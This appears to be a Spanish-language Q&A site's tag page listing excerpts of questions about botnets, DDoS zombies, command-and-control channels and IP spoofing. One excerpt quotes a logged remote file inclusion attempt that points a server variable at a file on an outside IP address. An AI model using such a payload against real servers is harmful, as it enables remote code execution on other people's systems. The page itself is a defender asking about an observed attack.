Preguntas con etiqueta 'botnet'

3
respuestas

¿Peligros específicos al unirse a una red de bots de Linux?

Entre el problema de PHP-as-cgi-bin y shellshock, he visto 4 o 5 scripts Perl diferentes que, cuando se ejecutan, pretenden hacer que su máquina sea parte de una botnet aterradora y atroz. ¿Cuál sería, específicamente, el problema si pasara p...
hecha 03.11.2014 - 04:21
3
respuestas

¿Hay botnets conocidos que se dirijan a teléfonos inteligentes?

¿Hay botnets conocidos que se dirijan específicamente a los teléfonos inteligentes? ¿Cuál es su topología y cómo se controlan? ¿Para qué se usan?     
hecha 04.09.2012 - 21:54
1
respuesta

código fuente de Zeus botnet

Estoy haciendo mi proyecto en botnets y quería entender el código fuente de la botnet Zeus. ¿Dónde está el lugar correcto para comenzar con un análisis del código fuente de zeus botnet? Necesito un buen recurso o un flujo / control del código...
hecha 19.06.2015 - 16:34
3
respuestas

¿Qué sucede con las máquinas zombie después de los ataques DDoS?

¿Las máquinas zombie que participan en un ataque DDoS pertenecen a personas comunes como tú y como yo? ¿Podemos ser parte de un ataque DDoS incluso sin darnos cuenta? ¿Qué pasa con estas máquinas esclavas después del ataque? ¿Se vuelven incap...
hecha 28.10.2016 - 10:50
4
respuestas

¿Cómo se comunican las botnets sin ser atrapadas?

Esto es algo sobre lo que he reflexionado durante un tiempo, pero nunca pensé en preguntar. ¿Cómo es posible que las botnets se puedan comunicar con un controlador de algún tipo para coordinar los ataques DDoS y otros nasties sin que se rastreen...
hecha 16.10.2015 - 14:54
3
respuestas

¿Ataque de raíz del servidor?

Alguien en Hungría intentó algo extraño recientemente: /?_SERVER[DOCUMENT_ROOT]=http://94.199.51.7/readme.txt? Esta es la URL parcial de mi registro, que muestra la página a la que fueron. Dieron la URL de mi sitio como referente. ¿Qué...
hecha 06.04.2013 - 13:08
1
respuesta

¿Cuál es la función de la suplantación de IP en los ataques DDoS?

He leído que la suplantación de IP se usa a menudo en los ataques de denegación de servicio, y también he leído recientemente sobre el filtrado de ingreso, que intenta utilizar listas negras para filtrar las direcciones IP falsificadas para defe...
hecha 28.12.2015 - 19:28
1
respuesta

¿Cómo se actualiza una botnet?

Hace poco comencé a estudiar cómo funcionan las botnets. Pero recientemente me encontré con un problema. Incluso traté de hacer una lluvia de ideas sobre cómo lo haría, pero no podía pensar cómo un bot actualizaría su código. También intenté inv...
hecha 28.05.2017 - 23:27
2
respuestas

BOTs C&C channel

¿Puede alguien explicar el C & C para los bots? Estoy leyendo un documento sobre el bot de Android y su explicación de algo llamado flujo de URL como método de C & C. Sin embargo, realmente no pude obtenerlo, así que necesito saber cóm...
hecha 01.04.2013 - 08:21
2
respuestas

¿Por qué se llamó así a Hail Mary Cloud? [cerrado]

El Hail Mary Cloud era una red de bots que, de manera lenta e inteligente, trató de forzar la fuerza bruta de los inicios de sesión de SSH. ¿Por qué se denominó Hail Mary Cloud ?     
hecha 07.04.2012 - 19:21